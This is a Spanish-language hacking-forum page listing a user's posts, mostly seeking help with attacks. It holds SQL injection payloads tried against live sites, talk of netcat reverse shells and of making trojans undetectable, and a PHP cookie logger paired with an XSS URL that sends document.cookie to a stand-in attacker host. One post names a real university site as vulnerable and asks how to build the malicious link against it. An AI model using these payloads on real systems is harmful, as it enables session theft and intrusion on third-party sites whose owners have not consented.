Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - 9reynas

#11
 ok  desacrge una pagina d euna postal    la qu e tiene una  animacion en flash ,  cuando fui a jalar el  swf de  c/documen and  sytem/ server/configuracion local /archivos temporales de internet (esa es la ruta  para los swf que quedan en la  pc) ok
  loq ue hago es guardar este swf en la carpeta madre donde  descargue la postal ) para  luego ocn el  dreamwear   linkearlo y asi me quede la postal con la animacion y todo de por  vida  :P  ok el problema es que  cuando linkeo a este  swf y guardo el archivo swf solo es la intro de la nimacion de dicha postal , entonces abri la postal  ya editada
y me abre  todo incluso la animacion pero solo pate en la que esta el cargador del swf y el resto de la animacion se plata alli , e parece que  el resto de la animaciondebe estar de parte del servidor  pero buenoq uiero saer  si dicha  parte  se descarga en mi pc y  en que parte,   las postales son de  www.tupostal.com , entonces   thx por las respuestas 
9reynas
ciao  salu2
#12
Nivel Web / Re: Problemas con Inyeccion SQL
22 Enero 2005, 06:38 AM
sorry por demorar en contestar ,, ok gracias porlas respuestas ,,, he leido que esto de los 1 o los null en los min depende  de los campos en la tabla , pero bueno ya las he probado y naa igual voya tratar de checar mas info  y buneo si encuentro algun nuevo dato lo posteo de todas formas noker y 1112ardiente  agregemme pa pasarle la direccion de l host sergius_21@hotmail.com
please decime que es por lo del sql


http://perso.wanadoo.es/sergius_21/
#13
Nivel Web / Re: Problemas con Inyeccion SQL
18 Enero 2005, 11:27 AM
 :D hace un poc tambien encontre una pagina con el bug de sql
pero me da la curiosidda de que el ' HAVING 1=1-- no ve va  es decir luego de poner en el url en

simplemente no me rula  es decir no me sirve .. como dicenq ue deberian servir en cada tutorialque he leido , pero he cambiado el ' por un 1 dejando la expresion en
1 HAVING 1=1--
y entonces queda en www.victim.com/algo.asp?id=1 HAVING 1=1-- con lo cual si me da la el nombre de la tabla y demas ,, bueno he de decir que soy nuevo en esto del sql ,,, buneo luego de checar que es vulnerable al bug , no queda mas que averiguar  los campos de la tabla ,,lo cual lo logro sin problemas, pero una vez mas aclarandoq ue en dichas sentencias en vez de poner el ' pongo un 1 en reemplazo ,, buno todo bien averiguo los campos sim problemas y loq ue sigue es averiguar que hay en dichos campos aqui mi problema ,ok cuando meto la sentenecia  en el url la cual vendria  ah hacer algo como
' UNION SELECT MIN(heading),1,1,1 FROM newsengine WHERE heading >'a'--    obetengo como resultado

Microsoft OLE DB Provider for SQL Server error '80040e14'

Line 1: Incorrect syntax near 'a'.

/news.asp, line 213

alguien me podria dar una mano en porque no me funciona esta sentencia ,,,
  :o thank de ante mano gente de elhacker uno de los mejores foros con gente de calidad como he visto
#14
acabo de leer un tutorialque dicho sea de paso esta buenisimo.. pero saben al acabar el tutorial me queda una duda  cuando termina haciendo la shell reversa con el netcat.... bueno mi duda nos eplantea en ese sentido se especifica que es pr que la victima puede tener  dhcp como es logico pero al dra la orden en el nc para ue se conecte con nosotros se  debe especificar nuestra ip...... muy logico ,, pero que pasa si  como es el caso mio y creoq ue el de la mayoria y tambien tenemos ip dinamica...
me parece que la forma de solucionar este problema seria subiendole un notificador  de ip a la victima
logicamente especificando como nombre de devolucion  algo como vncvictim o nose bueno o talvez algo que nunca he probado pero que para ser sincero no creo que resulte porque me parece que nc no tiene resolucion dns seria hacer la reverse shell  y en la ip  poner tudireccion.no-ip.org jejeje


saludos
#15
tenias razon instale la 6.0 profesional y ahora si e abre sin problemas  .. buneo gracias tio sos lo maximo  y aver si   abres otro hiloq u tenga la calidad de este ,, he checado el de desempaquetar el besat de potty  y esta bueno pero de ocmo modigficar los recursos una vez desempaquetado, no he  visto nada he buscado en google y nada nose si me das alguna refernecia o podria serun nuevo hilo..
bueno pienso que  y corrijeme si me equvoco por ejemplo cojer la dll y poner un bite mas  y esas cosas y luego empaquetarlo de nuevo con la dll detectada pero ahora indetectable .. dime eso es modificar recursos ???

bueno gracias por la respues
  ciao 9reynas
salu2
#16
jejeje xnex leete un poco de ezine www.zine-store.com.ar

buneo nada  no hay problema con mi pdf  por que he bajado los tuto de lo de troyanos indetectable  y me va  normal pero estos enlaces nada

salu2
#17
ya decia  yo que este hilo que me parece uno de los mejores de elhacker mo podia  acabar asi  con esas tonterias ..buneo  como dije antes excelente  hilo pero los enlaces al tutorial final me rulan  los bajo y nada se produce un error en el pdf
#18
respondiendole al tioq ue posteoun poco mas arriba basta con poner buscador.php en google  ::)
bueno checando mejor esto se me ocurre algoo mas el script de cokies.phpcomo se ve en su variable $cokie hace la peticion de la cokie



cookies.php

Código:
<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, "$cookie \n");
fclose($fff);
?>

ahora viene so esta claro  lo del archivo.txt que se deposita la cokie alli tambiene sta caro
pero en esta url
Código:
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;


hasta donde me dan mis pobrees conocimientos de cgi cuando se pasa una consulata a un formulario los datos introducidos se pasan como despues del scrip cgi  en este formato          lawe.com/script.cgi?nombre=valor&nombre1=valor1 etc etc dependiendo d elos campos del form

aqui mi duda entonces l primer cgi seria buscador.php

ahora la primera pareja seria
palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>

y la segunda pareja seria
buscar=;





ahora analizando la primera pareja checamos esta parte
'http://www.atacante.com/cookies.php?cookie='+document.cookie


ahora  en esto el  cgi seria cookies.php
y su pareja seria cookie='+document.cookie



ahora sia lguien postea las  fuentes de buscador.php seria buenisimo igual  la voya  buscar supongo que eso nos aclararia bastante loq ue hace esa url

buenoo voya buscar ciao 
9reynas
  de ante mano si me equivoco en algo corriganme y  nada salu2




#19
debido  a lo antiguo de este no se si  daran respuesta  bueno encontre una direccion que es vulnerable
http://campusvirtual.uma.es/ihj/_contenidos/buscador.php
bueno le das a <script>alert()</script> y te salta la alerta ,, asiq uebueno
umm cheque las fuentes y ....
<form action="" method="post">
<input type="text" name="search_term" size="40" maxlength="40" value="">
<input type="submit" value="Buscar">
</form>
como se daran cuenta este form no tiene ni nombre y el boton de envio tampoco tiene nombre mi pregunta es como quedaria la web a la  que le tendrian que linkear los demas
que hago remmplazo los espacios de los nombres con espacios vacios osea nada ??????????..............
asi ademas esta web  no tiene sistema de usuarios pero me queda la duda de como seria la direccionm aligna como dice neo hex

thank por las respuestas 9reynas
#20
nada decirles queles ah quedado una perla de tutorial muy bien hecho  y aunque leyendo el hilo basta para entender todo cunado bajo el tutorial  y lovoya  aver me sale que  el tuttorial tiene un fallo y no abre,, bueno lo he bajado de os tres enlaces y nada .. bueno  como dije escelente tutorial